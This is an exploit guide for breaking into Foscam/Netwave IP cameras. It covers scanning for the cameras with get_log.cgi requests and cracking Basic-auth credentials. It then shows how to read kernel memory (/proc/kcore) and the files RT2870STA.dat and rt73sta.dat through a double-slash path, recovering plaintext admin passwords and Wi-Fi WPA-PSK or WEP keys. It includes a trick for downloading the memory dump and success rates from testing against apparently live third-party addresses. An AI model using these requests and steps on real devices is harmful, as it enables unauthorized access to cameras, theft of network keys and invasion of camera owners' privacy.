Foscam New Exploit By privateroot

Scanning for Foscam cameras:

GET http://ipaddress:port/get_log.cgi HTTP/1.0
Accept: */*

Return: Netwave IP Camera

This will result in finding Foscam cameras.


Cracking Foscam cameras:

GET http://ipaddress:port/get_log.cgi HTTP/1.0
Accept: */*
Authorization: Basic Base64Credentials

Return: 200 OK

This will result in cracking a Foscam camera with the right Base64Credentials


Exploits:

http://ipaddress:port//proc/kcore

The kernel dump is very much in the wild but there is firmware updates to hide the Credentials.

To check to see the ones you can't get.

GET http://ipaddress:port//etc/RT2870STA.dat
Accept: */*

Return: 200 OK

Any IP which sends back a 200 OK you will not be able to see the Credentials within kcore.

There is a catch however. The data within RT2870STA.dat will hold WPAPSK which is the password for the camera or it will hold the WEP Security Key. Either way it's a vulnerability.

The RT2870STA.dat which hold the WPAPSK. Half the time the Username will be admin or it will be the SSID or the Alias name of the Device. Keeping the data within RT2870STA.dat is important if you want a helping hand on gaining access.

Now there is a exploit that has not been discovered in the wild yet. This exploit deals with rt73sta.dat. This file will hold the WEP Security Key or the WPAPSK, like RT2870STA.dat.

GET http://ipaddress:port//etc/rt73sta.dat HTTP/1.0
Accept: */*

Return: 200 OK

You wont find this file as much as you would find RT2870STA.dat and this is not a 100% working method. I tested 10 IP Address's and within those 10, 7 worked.

Now how this works....

Once we find a IP Address with rt73sta.dat

You will want to go to a forum or any blog that allows you to Preview your post.

Once you got one, post http://ipaddress:port//proc/kcore as a Preview than right click, Save As, save as anyword.txt this is to download the dump rather than stream it.

The file will never fully download. So once you see it stop, find your .txt and copy it and make a second copy of it. The reason is, a lot of the times if you cancel your download the file will disappear, we need to make a backup.

Open the .txt and go to Edit, Find...

Search for the devices title which means the title at the top left hand side of the login url which says Device(Name you want to search for) if it pops up, you've done it. You will see the Username and Password in plain text.

So alot of the times rt73sta.dat goes hand in hand with kcore. This is not 100% method remember.

There is also another method to see if kcore is worth checking out. This method is finding a IP with neither of the files. If you get a 404 on both you have a chance of seeing the Username and Password by doing the same method as rt73sta.dat but this method is even more rare like 1 out of 50.